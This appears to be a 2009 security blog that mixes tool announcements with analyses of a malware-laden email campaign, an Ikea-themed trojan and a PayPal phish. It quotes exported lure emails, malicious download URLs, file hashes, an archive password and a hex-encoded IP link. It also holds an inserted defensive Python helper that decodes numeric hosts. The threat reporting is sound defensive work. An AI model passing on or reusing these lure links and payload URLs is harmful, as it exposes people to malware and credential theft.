Blog for hpHosts, and whatever else I feel like writing about ....

Friday 30 January 2009

VIPRE PC Rescue

The VIPRE PC Rescue Program is a command-line utility that will scan and clean an infected computer that is so infected that programs cannot be easily run.

The VIPRE PC Rescue Program is packaged into a self-extracting executable file (.exe) that prompts the user for an "unpack" or installation location, then starts the scanner and performs a quick scan. The user can start the program either by opening it via windows or from the command line.

Virus definitions are included, and the program is self-running once executed. The initial scan, and all subsequent scans, include Rootkit Detection. Four command line options are available, enabling the program to perform a boot scan during the next start-up, perform a deep scan, log the events, and disable the rootkit.

Detections are consistent with the full VIPRE, and the VIPRE PC Rescue Program is designed to disinfect a system so infected that a user cannot install VIPRE.

Note: Directions for creating a "VIPRE PC Rescue CD" will be available shortly.

http://live.sunbeltsoftware.com

Ref:
http://sunbeltblog.blogspot.com/2009/01/free-vipre-pc-rescue-program.html

Thursday 29 January 2009

Spambot Search Tool v0.16

30-01-2009 v0.16

+ Now also checks BotScout (botscout.com, API key not required but is recommended as they only allow limited queries without one)
+ Text files now also created when using check_spammers_plain.php (if enabled)

More info + Download
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

/edit

This has been re-released due to a couple of modifications that were required;

1. Domain doing the querying (i.e. the server hosting the SBST) must be provided when submitting to fspamlist.com
2. Error code was added to Bot Scout (see: http://botscout.com/forum/index.php/topic,2.0.html)

Web Platform Installer 1.0 released

Just received this in the MS Partner Newsletter and thought I'd share it;

Web Platform Installer 1.0 is a free tool that enables you to easily download and install the latest components of the Microsoft Web Platform, including Internet Information Services (IIS) 6.0 and 7.0, SQL Server 2008 Express, .NET Framework 3.5 SP1 and Visual Web Developer 2008 Express SP1. The Web Platform Installer offers a single installer to help you obtain the software you need to build and run a complete Web solution on the Microsoft Web platform, whether you are using Windows XP, Windows Server 2003, Windows Vista, or Windows Server 2008. With the Web Platform Installer, you can:

- Obtain components of the Microsoft Web Platform quickly and easily
- Choose which components to install to set up a complete or custom Web platform
- Install the latest versions of Microsoft Web Platform products, components and tools


http://www.microsoft.com/web/channel/products/WebPlatformInstaller.aspx

One on One with CEO of Web of Trust

If I named ten extensions I am the biggest fan of, WOT Web of Trust would be on that exclusive list.

Why? They provide a great service to the public, helping organize the public to alert itself about risky web sites. The real power in WOT isn't the tools, it is the users. It is the perfect mash up of the right tools, at the right time. Anything that is simple to use, and makes users more aware of the risks around them is a good thing. With that said, I wanted to talk a little more about the service with one of the people behind the magic, Esa Suurio, the CEO of Web of Trust.


Read the interview over at;

http://www.firefoxfacts.com/2009/01/20/one-on-one-with-ceo-of-web-of-trust/

Spambot Search Tool v0.15 Released

29-01-2009 v0.15

+ View spammers you've asked the filter to log to text file
+ View spammers you've had your mod email to you (assumes you've used the same email format as outlined on the TeMerc forums)
* Fixed spammers particulars not being logged to text file properly
- Ditched "Full" package in favour of the Simple (less to update and simple is what most want)

http://support.it-mate.co.uk/?mode=Products&act=DL&p=spambotsearchtool

Tuesday 27 January 2009

Hotmail finally offering POP/IMAP access!

... and it's about bleeding time. Though this has been available via Outlook (courtesy of the Outlook Connector), this hasn't been viable for those either;

1. Without Outlook
2. Unwilling/unable to install the connector
3. Unaware of the connector
4. Wanting to access the accounts via script

Now that they are offering this for all accounts without requiring the connector, everyone and their dog can access their accounts via whichever program they choose, or, if they so wish, via their own custom scripts/programs.

Read more over at the FireTrust blog;

http://www.firetrust.com/en/blog/chris/hotmail-now-with-free-pop3-and-imap-access

For those wanting the quick low-down, the access details (courtesy of Chris at Firetrust) are;
  1. POP server: pop3.live.com
  2. POP server port: 995
  3. POP SSL required? Yes
  4. User name: Your Windows Live ID, for example yourname@hotmail.com
  5. Password: The password you usually use to sign in to Hotmail or Windows Live
  6. SMTP server: smtp.live.com
  7. SMTP server port: 25
  8. SMTP Authentication required? Yes (same as POP3 username and password)
  9. SMTP SSL required? Yes


They've not mentioned the IMAP details, but I am on a hunt to see if I've just missed them ....

Well smeg me silly, Red Dwarf's coming back!!

... but dear god I hope it's better than series 5-8 (they were good, but no-where near as good as 1-4).

It's taken them 21 years, but this Easter the crew of Red Dwarf will finally return to Earth in a two-part special which reunites many of the original cast.

The homecoming is courtesy of digital channel Dave, which on Friday 10 April will broadcast the first installment of Red Dwarf: Back to Earth - penned by the show's co-creator Doug Naylor and featuring Chris Barrie as Rimmer, Craig Charles as Lister, Danny John-Jules as Cat and Robert Llewellyn as Kryten.


http://www.theregister.co.uk/2009/01/27/red_dwarf/

Waledac identification implemented in hpHosts and vURL

Just a note folks, thanks to Sudosecure, both hpHosts Online and vURL Online will now tell you if the domain being queried is known to be associated with the Waledac fast flux trojan.

Examples

vURL Online (yourregards.com)
http://vurl.mysteryfcm.co.uk/?url=184504

hpHosts Online (76.108.154.195)
http://hosts-file.net/?s=76.108.154.195

hpHosts Online (yourregards.com)
http://hosts-file.net/?s=yourregards.com

Saturday 24 January 2009

Update: r00t-y0u email switches to attachment

Whether or not this is the same miscreant as last time remains to be seen (though the file has the same properties), but it seems whichever it is, they've switched to a more direct route of infection (see left).

I am curious, with the amount of forum databases they've stolen from each other, why they're picking on r00t-y0u?

Exported by: Outlook Export v0.1.4

From: admin
E-mail:admin@swisskit.com [ 64.202.189.170 - pwfwd-v01.prod.mesa1.secureserver.net ]
Date: 24/01/2009 18:26:16
Subject: last versio update
**************************************************************************
Links
**************************************************************************

Link: hxxp://sm1.intellimaxx.net:80/track?type=click&mailingid=12131232&messageid=0000&databaseid=1234&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&
Domain: sm1.intellimaxx.net
IP: 209.171.53.170 [ sm1.intellimaxx.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: hxxp://sm1.intellimaxx.net:80/track?mailingid=12131232&messageid=0000&databaseid=1234&type=open&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&
Domain: sm1.intellimaxx.net
IP: 209.171.53.170 [ sm1.intellimaxx.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
http://sm1.intellimaxx.net:80/track?type=click&mailingid=12131232&messageid=0000&databaseid=1234&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&& <IMG SRC="http://sm1.intellimaxx.net:80/track?mailingid=12131232&messageid=0000&databaseid=1234&type=open&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&" WIDTH="1" HEIGHT="1" BORDER="0" />

last vresion update.

password: qpwoeiruty



admin@swisskit.com.

**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2><A HREF="http://sm1.intellimaxx.net:80/track?type=click&mailingid=12131232&messageid=0000&databaseid=1234&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&">http://sm1.intellimaxx.net:80/track?type=click&mailingid=12131232&messageid=0000&databaseid=1234&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&</A>  <IMG SRC="<A HREF="http://sm1.intellimaxx.net:80/track?mailingid=12131232&messageid=0000&databaseid=1234&type=open&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&">http://sm1.intellimaxx.net:80/track?mailingid=12131232&messageid=0000&databaseid=1234&type=open&serial=1222716135&emailid=[REMOVED]&userid=43912&extra=&&&</A>" WIDTH="1" HEIGHT="1" BORDER="0" /><BR>
<BR>
last vresion update.<BR>
<BR>
password: qpwoeiruty<BR>
<BR>
<BR>
<BR>
admin@swisskit.com.</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: admin@swisskit.com
Delivered-To: [REMOVED]
X-FDA: 61836659262
X-SpamScore: 5
X-Spam-Summary: 10,1,0,493736707aa6fca6,21232f297a57a5a7,admin@swisskit.com,[REMOVED],
RULES_HIT:152:355:379:495:509:541:800:871:967:973:978:980:988:989:996:1000:1183:1260:1261:
1308:1309:1311:1313:1314:1345:1432:1515:1516:1518:1519:1529:1538:1569:1575:1594:1595:1676:
1696:1711:1714:1730:1747:1764:1766:1792:2198:2199:2393:2525:2561:2564:2682:2685:2857:2859:
2895:2933:2937:2939:2942:2945:2947:2951:2954:3022:3038:3151:3872:3876:3877:3934:3936:3938:
3941:3944:3947:3950:3953:3956:3959:4321:4648:5007:6114:6506:7281:7679:8501:9025:9391,0,RBL
:209.171.53.170-lbl7.mailshell.net-127.0.0.100,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:
none,DomainCache:0,MSF:not bulk,SPF:,MSBL:none,DNSBL:none
Received: from sm1.intellimaxx.net (sm1.intellimaxx.net [209.171.53.170])
by imf27.hostedemail.com (Postfix) with ESMTP
for <[REMOVED]>; Sat, 24 Jan 2009 19:42:04 +0000 (UTC)
Received: from sm1.intellimaxx.net ([10.4.0.170])
by sm1.intellimaxx.net (StrongMail Enterprise 4.1.1.1(4.1.1-44827)); Sat, 24 Jan 2009 13:26:17 -0500
X-VirtualServer: Default, sm1.intellimaxx.net, 0.0.0.0
X-VirtualServerGroup: Default
X-MailingID: 1222716135::12131232::1234::0000::43912::43912
X-SMHeaderMap: mid="X-MailingID"
X-Mailer: StrongMail Enterprise 4.1.1.1(4.1.1-44827)
X-Destination-ID: [REMOVED]
X-SMFBL: cjAwdC15MHVfb3JnQGl0LW1hdGUuY28udWs=
Content-Transfer-Encoding: 7bit
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_B0F2_327B23C6.643C9869"
MIME-Version: 1.0
Message-ID: <1222716135.43912@swisskit.com>
Subject: last versio update
Date: Sat, 24 Jan 2009 13:26:16 -0500
To: [REMOVED]
From: "admin" <admin@swisskit.com>




setup.exe
http://www.virustotal.com/analisis/30db38531435dfef018ce2b13afb6f9a

setup.rar
http://www.virustotal.com/reanalisis.html?b4e8ed0d8f237f57bc7bb5b8a657d281

... and yep, detection is still rubbish.

/edit

Forgot to add the file's new MD5: AFF965C7FEBD4CF6B110F0C824D471A9

Friday 23 January 2009

WorldNic (Network Solutions) resolution issue

See the following for details;

http://system.opendns.com/2009/01/23/81/

Stolen r00t-y0u DB leads to malware

What happens when you cross a stolen hacker database with open distribution? Why this of course (graphic version to the left);

Exported by: Outlook Export v0.1.4


From: Enric
E-mail:Enric@gmail.com [ 64.233.161.83 - od-in-f83.google.com ]
Date: 23/01/2009 18:57:07
Subject: realy nice video check it.
**************************************************************************
Links
**************************************************************************

Link: http://sm1.intellimaxx.net:80/track?mailingid=112233&messageid=121&databaseid=1234&type=open&serial=1222716134&emailid=[REMOVED]&userid=43912&extra=&&&
Domain: sm1.intellimaxx.net
IP: 209.171.53.170 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://video-share.servegame.org/Best.html
Domain: video-share.servegame.org
IP: 63.208.196.110 [ hop.mywebhop.org ]
hpHosts Status: Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
<http://sm1.intellimaxx.net:80/track?mailingid=112233&messageid=121&databaseid=1234&type=open&serial=1222716134&emailid=[REMOVED]&userid=43912&extra=&&&> nice video http://video-share.servegame.org/Best.html enjoy!!!


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2> <<A HREF="http://sm1.intellimaxx.net:80/track?mailingid=112233&messageid=121&databaseid=1234&type=open&serial=1222716134&emailid=[REMOVED]&userid=43912&extra=&&&">http://sm1.intellimaxx.net:80/track?mailingid=112233&messageid=121&databaseid=1234&type=open&serial=1222716134&emailid=[REMOVED]&userid=43912&extra=&&&</A>> nice video <A HREF="http://video-share.servegame.org/Best.html">http://video-share.servegame.org/Best.html</A> enjoy!!!<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: enric@gmail.com
Delivered-To: [REMOVED]
X-FDA: 61833107406
X-Panda: scanned!
X-SpamScore: 5
X-Spam-Summary: 73,5,0,8e5bddad4f42bc39,8efcb81be1d9d39e,enric@gmail.com,[REMOVED],RULES_HIT:46:150:152:355:375:379:495:509:541:857:946:967:972:973:980:988:989:996:1183:1224:1260:
1261:1311:1312:1313:1314:1345:1432:1515:1516:1517:1519:1527:1534:1537:1569:1593:1594:
1595:1596:1676:1696:1699:1711:1714:1730:1747:1766:1792:2194:2198:2199:2200:2393:2525:
2561:2564:2682:2685:2857:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3770:3872:
3876:3877:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4648:5007:6114:6117:
7679:8501:8599:8985:9025:9040:9108:9388:9391:9413,0,RBL:209.171.53.172-lbl7
.mailshell.net-127.0.0.100,CacheIP:none,Bayesian:0.5,0.5,0.5
,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fu,MSBL:none,DNSBL:none
Received: from sm1.intellimaxx.net (unknown [209.171.53.172])
by imf19.hostedemail.com (Postfix) with ESMTP
for <[REMOVED]>; Fri, 23 Jan 2009 20:12:41 +0000 (UTC)
Received: from sm1.intellimaxx.net ([10.4.0.170])
by sm1.intellimaxx.net (StrongMail Enterprise 4.1.0(4.1.0-41174)); Fri, 23 Jan 2009 13:54:16 -0500
X-VirtualServerGroup: Default
X-MailingID: 1222716134::112233::1234::121::43912::43912
X-SMHeaderMap: mid="X-MailingID"
X-Mailer: StrongMail Enterprise 4.1.0(4.1.0-41174)
X-Destination-ID: [REMOVED]
X-SMFBL: cjAwdC15MHVfb3JnQGl0LW1hdGUuY28udWs=
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Content-Type: text/html;
charset="UTF-8"
Reply-To: Enric@gmail.com
MIME-Version: 1.0
Message-ID: <1222716134.43912@gmail.com>
Subject: =?UTF-8?B?IHJlYWx5IG5pY2UgdmlkZW8gY2hlY2sgaXQu?=
Date: Fri, 23 Jan 2009 13:57:07 -0500
To: [REMOVED]
From: "Enric" <Enric@gmail.com>


The malicious link in this case is the one leading to;

video-share.servegame.org/Best.html (IP: 63.208.196.110 [ hop.mywebhop.org ])

... as this leads directly to codec infections at;

danicamarkovic.ca/php/codecs/codec_pack_3.2.1.exe (IP: 38.113.185.126)
track-turbo.com/download/TestCodec.v.3.127.cab (IP: 203.169.164.18 [ vp164018.hk.uac65.hknet.com ])

The latter of these two, track-turbo.com, returns a 404. Detection for codec_pack_3.2.1.exe is absolutely rubbish as usual.

http://www.virustotal.com/analisis/85cbee23493d14f184cf6f5777d98c52

File properties;

Company: BCN
Version: 1.0.0.0
Size: 164K
MD5: 6B6159546D2AC50487D953D3B500366F

Based on the strings, attempts to run it in VMWare, Sandboxie, Anubis, ThreatExpert et al, would fail (not that it'll stop me trying);



Needless to say, this is being targeted specifically at r00t-y0u members (not that surprising - the various forums are often trying to hack each other and/or out-do each other in varying ways). However, this domain is likely going to be used in other less targeted campaigns, so block it ASAP.

Tuesday 20 January 2009

WinPatrol 16 Beta: Scotty gots a new leash!

Scotty now has a new leash in the form of v16 beta, released yesterday. New features include;

- Specifically designed to work with Windows 7
- UAC alert only when actually required
- Selectively hide alerts
- Selectively hide RunOnce change alerts

Read the full write up, and download the beta over at;

http://www.winpatrol.com/beta16.html

hpHOSTS - UPDATED January 20th, 2009

The hpHOSTS Hosts file has been updated. There is now a total of 54,479 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 20/01/2009 15:20
  2. Last Verified: 20/01/2009 15:00

Download hpHosts now!
http://hosts-file.net/?s=Download

Sunday 18 January 2009

EU gone bonkers .... again (suing Microsoft - again)

Bradley pretty much says exactly what my thoughts are on this;

Dear EU commission:

Do you take Paypal? Seriously. I see that you are suing Microsoft again. http://www.ft.com/cms/s/0/647e7e40-e599-11dd-afe4-0000779fd2ac.html?nclick_check=1 Must mean you need more money. So how about I send you some so that more software building decisions are done because it's solid engineering decisions and not some stupid counter move against an EU lawsuit. Every time I look at a confusing Microsoft SKU list, the EU versions of the software don't help me understand what product I need to buy.

I'm sorry to be in a snarky mood tonight but I'm tired of shortcuts, buttons and toolbars that I kinda like being impacted by your threats. Remember when one of the hotfixes and later a service pack took off the shortcut in XP to show IE on the desktop? Yeah, my impression we have you guys to thank for that one. It was a competition move. Already I'm annoyed that Windows 7 doesn't natively have IE at the top of the Start menu. Do we get to thank you for that default?


Read the full story:
http://msmvps.com/blogs/bradley/archive/2009/01/18/dear-eu-do-you-take-paypal.aspx

Note: ft.com require registration to read their articles .... (says I've read 3 in the last 30 days, which is strange considering it's the first time I've been to their site)

Saturday 17 January 2009

Adobe Flex In Visual Studio

Latest news from my friend Huw at Bitwise Magazine;

"Just a quick note to let you know that my company, SapphireSteel Software, has just released beta 2 of our new Adobe Flex IDE for Visual Studio.
This version adds IntelliSense including class, member, event and object completion for both the ActionScript programming language and MXML formatting code."


Read more and download....
http://www.bitwisemag.com/2/Adobe-Flex-In-Visual-Studio-latest

Friday 16 January 2009

sGB guestbook service now back online!

I am pleased to announce that the sGB service is now back online.

I've taken this chance to implement a few changes to the service to try and improve it. The first is e-mail confirmation - this is now required for new accounts.

The second is not something you should notice and simply involves some back end changes to try and make it a little easier as far as updating/modifying (basically to cut down on my having to make changes to hundreds of files).

Unfortunately however, all of the old guestbooks were lost. This means you'll need to re-register your account.

sGB - Free hosted guestbooks, complete with administration, spam protection and customization - and still advert free!
http://guestbook.it-mate.co.uk

Thursday 15 January 2009

Directi still allowing criminals and scammers!

Yep, not surprisingly, they evidently haven't stayed all lovely and caring for long (likely just long enough for the last hailstorm of hate to die down).

See the information on the Spyware Sucks blog for details - then feel free to shout at Directi ;o)

Glowing brain malvertizement – and, once again, we find DIRECTI
http://msmvps.com/blogs/spywaresucks/archive/2009/01/15/1661878.aspx

Directi Internet Solutions strikes again
http://msmvps.com/blogs/spywaresucks/archive/2009/01/13/1661206.aspx

... and whilst you're there, check out this one too - glad it's not just me that finds adverts in RSS feeds completely irritating (though admittedly, I also hate adverts in e-mails and newsletters too - but that's just me);

Advertising in RSS feeds
http://msmvps.com/blogs/spywaresucks/archive/2009/01/14/1661550.aspx

hpObserver 0.4.2 released

I am pleased to announce that hpObserver 0.4.2 has been released. Changes in this release include;

Added: Select fields to export when saving results (Tools > Settings > Export)
Added: Check site with Browser Defender (requested)
Added: Check site with Norton Safe Web (requested)
Added: Check site with Exploit Prevention Labs Links Scanner

Modified: "Check this site ..." options moved to "Check this site" sub menu in order to shorten context menu (requested)
Modified: Updated vURL query menu (pointed to old vURL Online website)
Modified: Updated Web Sniffer query menu

I would also like to extend a huge thank you to Hardhead for letting me know the program worked wonderfully on the new Windows 7 Beta.

Download:
http://support.it-mate.co.uk/?mode=Products&act=DL&p=hpobserver

Wednesday 14 January 2009

Outlook Export 0.1.4 released

A new update to Outlook Export is now available. The updates include;

Version: 0.1.4

Modified: New attachments icon for e-mails (in list, not toolbar)
Modified: Re-written export routines to prevent clashes with same filenames overwriting each other

Misc: Other minor modifications

Version: 0.1.3 (Date/Time: 22/12/2008 21:37:50)

Added: Export Outlook mail accounts (Tools > Outlook Mail Accounts)
Added: View Outlook mail accounts (Tools > Outlook Mail Accounts)

Modified: Updated End User Licence Agreement
Modified: Support links changed due to hpHosts forums being offline

Misc: Other minor modifications

Version History
http://support.it-mate.co.uk/?mode=Products&act=History&p=outlookexport

Download:
http://support.it-mate.co.uk/?mode=Products&act=DL&p=outlookexport

Ikea: Miscreant for acceptable

I've been archiving malicious e-mails for years now, and have seen everything from greetings cards, to Airline tickets, to UPS parcels to lord knows what else, but was rather surprised today when I received several e-mails claiming to be from Ikea;

Welcome to IKEA.com affordable solutions for better living

IKEA has a Fantastic new FREE tool for home decorating.

Introducing our Home Planner software which allows you to plan your home in a 3D environment.

Simply follow the instructions in the attachment and start planning your dream home today.

Inter IKEA Systems B.V. 1999 - 2009
About the IKEA Concept and IKEA franchising


The attachment of course, is a lovely little zip file, ikea.zip (MD5: DD9EF0E43889DE84F076789D802A8F57), and inside, a 342K SCR file (MD5: 3EE4F3EFAB94BFCE790A5FB93D1465C6), trying to masquerade as a .doc (MS Word) file.



Detection isn't great, but is better than usual, with 16/39 detecting it;

http://www.virustotal.com/analisis/60db801714d94bf4cf47a1d0e1f2b849

/edit 15-01-2009 00:02

ThreatExpert got back to me with the sandbox report;

http://www.threatexpert.com/report.aspx?md5=3ee4f3efab94bfce790a5fb93d1465c6

Tuesday 13 January 2009

secure.paypal-cgi-bin-us.xn.pl > 166.104.226.75 (infosec.hanyang.ac.kr) > abiedanter.co.uk

PayPal phishing scams are nothing new, but this one is rather interesting as it uses 3 different hosts for a single phish. One for the e-mail, the second loaded both via an iFrame AND via the LINK tag normally used for the shortcut icon;

<link rel="Shortcut icon" href="http://0xa668e24b/~hkoh/secure.paypal.com/webscr.htm?/favicon.ico" />




0xa668e24b is a hex encoded IP and decodes to 166.104.226.75, which resolves to infosec.hanyang.ac.kr. When you click the link in the e-mail, it redirects to;
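A defender-side helper, added here as an example (not the post's own code), that turns the numeric host encodings browsers accept back into dotted-quad form so a host like 0xa668e24b can be matched against a blocklist. It goes beyond the plain hex case in the LINK tag above and also handles decimal, octal and dotted mixed forms; the markup sample embeds that LINK tag plus a constructed PayPal anchor for contrast.

```python
import re
from urllib.parse import urlsplit

# One dotted component: 0x-prefixed hex, or a run of digits (octal if it
# has a leading zero, decimal otherwise), as browsers interpret them.
COMPONENT_RE = re.compile(r"0[xX][0-9a-fA-F]+|[0-9]+")


def decode_numeric_host(host):
    """Return the dotted-quad form of a numeric IPv4 host, or None when the
    host is a normal hostname or an out-of-range numeric form."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        if not COMPONENT_RE.fullmatch(p):
            return None
        if p.lower().startswith("0x"):
            values.append(int(p, 16))
        elif len(p) > 1 and p.startswith("0"):
            values.append(int(p, 8))
        else:
            values.append(int(p, 10))
    # Every component but the last is one octet; the last one fills all the
    # remaining bytes (so "0xa668e24b" alone covers all four octets).
    *lead, last = values
    if any(v > 255 for v in lead):
        return None
    remaining = 4 - len(lead)
    if last >= 1 << (8 * remaining):
        return None
    tail = [(last >> (8 * i)) & 0xFF for i in reversed(range(remaining))]
    return ".".join(str(o) for o in lead + tail)


HREF_RE = re.compile(r'(?:href|src)\s*=\s*"([^"]+)"', re.IGNORECASE)


def find_numeric_hosts(markup):
    """Return (url, decoded_ip) for every href/src whose host is a numeric
    IPv4 encoding rather than a hostname; such links deserve a closer look."""
    found = []
    for url in HREF_RE.findall(markup):
        host = urlsplit(url).hostname or ""
        ip = decode_numeric_host(host)
        if ip is not None:
            found.append((url, ip))
    return found


# Constructed sample: the favicon LINK tag from the phish plus a normal link.
SAMPLE_MARKUP = (
    '<link rel="Shortcut icon" '
    'href="http://0xa668e24b/~hkoh/secure.paypal.com/webscr.htm?/favicon.ico" />\n'
    '<a href="https://www.paypal.com/us/wf/f=ap_email">PayPal</a>\n'
)

if __name__ == "__main__":
    for url, ip in find_numeric_hosts(SAMPLE_MARKUP):
        print(f"{ip}  <-  {url}")
```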



Finally it uses a Form Mail script at abiedanter.co.uk (195.171.90.14 - orion.wyehosts.net) to send the victim's details to the phisher (in this case spmdnss@gmail.com);



So what of the e-mail itself? Well since I don't use HTML e-mail (and neither should you!), I can only show it in plain text form. The following is an export of the entire e-mail, including headers.

Exported by: Outlook Export v0.1.3

From: PayPal
E-mail:service@paypal.inc.com [ - Invalid IP was passed to me ]
Date: 13/01/2009 18:10:43
Subject: New email address added to your PayPal account
**************************************************************************
Links
**************************************************************************

Link: https://www.paypal.com/us/wf/f=ap_email
Domain: www.paypal.com
IP: 64.4.241.33 [ www.paypal.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://secure.paypal-cgi-bin-us.xn.pl/?wf/f=ap_email
Domain: secure.paypal-cgi-bin-us.xn.pl
IP: 87.98.236.114 [ granat.cal.pl ]
hpHosts Status: Listed
MDL Status: Not Listed
PhishTank Status: true

**************************************************************************
Text Version
**************************************************************************
You have added jamessoul899@yahoo.com as a new email address for your PayPal account.

If you did not authorize this change or if you need assistance with your account, please contact PayPal customer service at:

https://www.paypal.com/us/wf/f=ap_email <http://secure.paypal-cgi-bin-us.xn.pl/?wf/f=ap_email>

Thank you for using PayPal!
The PayPal Team

-----------------------------

**************************************************************************
Headers
**************************************************************************
Return-Path: service@paypal.inc.com
Delivered-To: hphosts@[REMOVED]
X-FDA: 61796512134
X-Panda: scanned!
X-SpamScore: 5
X-Spam-Summary: 80,6,0,4778cd017079e040,ad69e733ebae8d26,service@paypal.inc.com,customer@paypal.com,RULES_HIT:
69:375:379:539:540:541:542:543:567:800:967:973:980:983:988:989:1026:1155:1208:1224:12
54:1260:1311:1313:1314:1431:1437:1515:1516:1517:1534:1541:1561:1587:1590:1593:1594:16
31:1653:1699:1711:1714:1730:1747:1766:1792:2073:2076:2194:2198:2199:2200:2393:2525:25
60:2564:2610:2682:2685:2857:2859:2890:2900:2910:2933:2937:2939:2942:2945:2947:2951:29
54:3022:3043:3137:3139:3155:3280:3865:3869:3873:3876:3877:3934:3936:3938:3941:3944:39
47:3950:3953:3956:3959:4042:4321:5007:6114:6261:7679:8501:8568:8957:9025:9040:9388,0
,RBL:62.140.23.58-lbl7.mailshell.net-127.0.0.100,CacheIP:none,Bayesian:0.5,0.5,0.5
,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:,MSBL:none,DNSBL:none
Received: from s558.evanzo-server.de (s558.evanzo-server.de [62.140.23.58])
by imf04.hostedemail.com (Postfix) with ESMTP
for <hphosts@[REMOVED]>; Tue, 13 Jan 2009 18:10:46 +0000 (UTC)
Received: (qmail 19954 invoked from network); 13 Jan 2009 19:18:59 +0100
Received: from unknown (HELO User) (218.154.52.101)
by s558.evanzo-server.de with SMTP; 13 Jan 2009 19:18:59 +0100
From: "PayPal"<service@paypal.inc.com>
To: customer@paypal.com
Subject: New email address added to your PayPal account
Date: Wed, 14 Jan 2009 03:10:43 +0900
MIME-Version: 1.0
Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000


abiedanter.co.uk is a legit website. The only thing they're guilty of here is being silly enough not to lock down their form mail scripts to prevent third party use. The owner information for the other two involved is;

WhoIs Information:

DOMAIN: xn.pl
registrant's handle: ont_o85624 (INDIVIDUAL)
nameservers: ns2.cal.pl. [87.98.162.72]
ns1.cal.pl. [87.98.237.11]
created: 2004.03.22 08:33:47
last modified: 2008.12.14 20:43:45

option created 2008.02.01 00:03:06

TECHNICAL CONTACT:
company: Lukasz Przekop
street: Solidarnosci 60/4
city: 00-240 Warszawa
location: PL
handle: ont_t85614
last modified: 2008.03.12

REGISTRAR: Grupa Onet.pl SA
ul. G. Zapolskiej 44
30 - 126 Krakow
Polska/Poland
+48. 12 2600200
bok@onet.pl


Domain Name : hanyang.ac.kr
Registrant : Hanyang University
Registrant Address : 17, haengdang-dong, Songdong-gu, Seoul, Korea Hanyang University, Haengdang-dong, Seongdong-gu Seoul, KR
Registrant Zip Code : 133070
Administrative Contact(AC): JeKwang Mun
AC E-Mail : moonriver@hanyang.ac.kr
AC Phone Number : 02-2220-1427
Registered Date : 1994. 03. 07.
Last updated Date : 2008. 12. 04.
Expiration Date : 2009. 05. 01.
Publishes : Y
Authorized Agency : Inames Co., Ltd.(http://www.inames.co.kr)

Primary Name Server
Host Name : hynetm.hanyang.ac.kr
IP Address : 166.104.27.6

Secondary Name Server
Host Name : ansan-d.hanyang.ac.kr
IP Address : 166.104.239.11
Host Name : kns.kornet.net
Host Name : ns.lgdacom.net


As always, don't blindly click on links in e-mails. The only reason these phishing scams are successful is because people don't actually look at where the link is going to take them, nor do they look at the URL in the address bar! You need to start taking notice and actually type the website's address into the browser's address bar (irrespective of where the link is going to take you, or claims it is going to take you).

Sunday 11 January 2009

Spambot Search Tool v0.13

Just a note folks, Spambot Search Tool v0.13 has now been released. The only change in this release is a modification to the functions so those without file_get_contents() can still use it via cURL (assuming cURL is installed and enabled).

http://support.it-mate.co.uk/?mode=Products&act=DL&p=spambotsearchtool

Thursday 8 January 2009

firnop.cn update

Well well, looks like it is a once per 24 hour deal as I apparently accessed it at 20:25 yesterday, and an attempt to access it again whilst testing modifications to vURL Desktop Edition, showed I was again allowed access. The code is the same as yesterday pretty much, with the only obvious change (besides the variable names) being the text field's ID, this time being mudora.



vURL Online (cached 08-01-2009 23:01):
http://hosts-file.net/misc/firnop_cn/vURL_Online_-_firnop_cn-080109.html

Once again we're given a 404 on subsequent attempts, as shown by;

http://vurl.mysteryfcm.co.uk/?url=155207

IP and PTR haven't changed, neither has the code itself (or the results of the code when decoded). The only change in fact, seems to be the text field's ID value and the variable names.

New powers for police to hack your PC

I first noticed this story on the Eset blog and though absolutely disgusted (if true, I've not seen anything that verifies what The Independent is telling us yet), am finding myself laughing hysterically at the same time.

The story reads in part:

Police have been given the power to hack into personal computers without a court warrant. The Home Office is facing anger and the threat of a legal challenge after granting permission. Ministers are also drawing up plans to allow police across the EU to collect information from computers in Britain.

The moves will fuel claims that the Government is presiding over a steady extension of the "surveillance society" threatening personal privacy.

